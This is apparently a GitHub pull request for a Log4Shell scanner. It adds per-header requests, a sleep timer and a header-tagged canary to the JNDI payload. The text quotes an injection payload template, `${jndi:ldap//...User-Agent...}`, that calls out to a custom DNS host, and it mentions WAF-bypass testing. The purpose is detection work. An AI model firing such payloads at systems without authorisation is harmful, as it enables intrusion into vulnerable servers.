This repository has been archived by the owner on Dec 6, 2022. It is now read-only.
Update Scanner to allow individual requests, sleep timer and payload identifier #29
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Added the following capabilities:
Noticed that the scanner submits all headers/parameters at once. This can cause issues with how the target server responds to the request (ie: server may not accept certain headers, but this is not easily identifiable). Added a functionality to send all headers individually (-i, --individual)
Added ability to sleep between requests (--sleep-time [Default: 1]). This will assist with reviewing DNS/CanaryToken logs to more easily identify which header is vulnerable based off the REQUEST time and RESPONSE time by custom DNS.
Added payload header canary. When submitting a request, the payload will contain the header and parameter value. For example: ${jndi:ldap//<targetHost>.User-Agent.<customDNS>}. Now, when reviewing logs, you can identify that the User-Agent header was where the vulnerability was.
Terminal will display the type of request (GET/POST), the Header that was submitted and the UTC time in which it was sent. This will also help with identifying CanaryToken, Interact.sh and Burp Collaborator responses
|
Above shows print statements with Header being submitted and time sent (in UTC to help compare with CanaryToken time)
Above shows burp collaborator with Header that triggered vulnerability |
geodaftw
changed the title
Fixed UTC time. Added --show-header Added HEADER value in batch request
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Update Scanner to allow individual requests, sleep timer and payload identifier
π£ Description
I added 3 aspects:
Noticed that the scanner submits all headers/parameters at once. This can cause issues with how the target server responds to the request (ie: server may not accept certain headers, but this is not easily identifiable). Added a functionality to send all headers individually (-i, --individual)
Added ability to sleep between requests (--sleep-time [Default: 1]). This will assist with reviewing DNS/CanaryToken logs to more easily identify which header is vulnerable based off the REQUEST time and RESPONSE time by custom DNS.
Added payload header canary. When submitting a request, the payload will contain the header and parameter value. For example: ${jndi:ldap//.User-Agent.}. Now, when reviewing logs, you can identify that the User-Agent header was where the vulnerability was.
Terminal will display the type of request (GET/POST), the Header that was submitted and the UTC time in which it was sent. This will also help with identifying CanaryToken, Interact.sh and Burp Collaborator responses
π Motivation and context
I noticed that the scanner submits all headers at once. This can cause issues with how the server responds (it may give a 400 for example). It may be impossible to know which header is not accepted. Instead, this update allows individual requests to be submitted for a more targeted scan.
With that said, if the vulnerability is triggered, it may be difficult to know which header or parameter triggered the vulnerability. Added a RegEx ability to remove a canary token in the payload (HEADER) with the Header/Parameter that is being submitted. This will allow an easier time identifying what triggered the vulnerability.
π§ͺ Testing
I tested this by scanning a vulnerable host with a smaller header.txt file (to speed up testing). Proxied the request through burp to verify that request is working as intended (is the header name in the payload, is it sleeping for proposed time, is the parameter in the payload, does the terminal display the request time and appropriate header, etc)
I tested with the waf-bypass and appears to incorporate these changes correctly. Also tested with --test-CVE-2021-45046 and appeared to work correctly as well.
I did not teste with the default interact.sh callback provider. All tests were performed with Burp Collaborator and CanaryToken.org
β Pre-approval checklist
in code comments.
to reflect the changes in this PR.
β Pre-merge checklist
β Post-merge checklist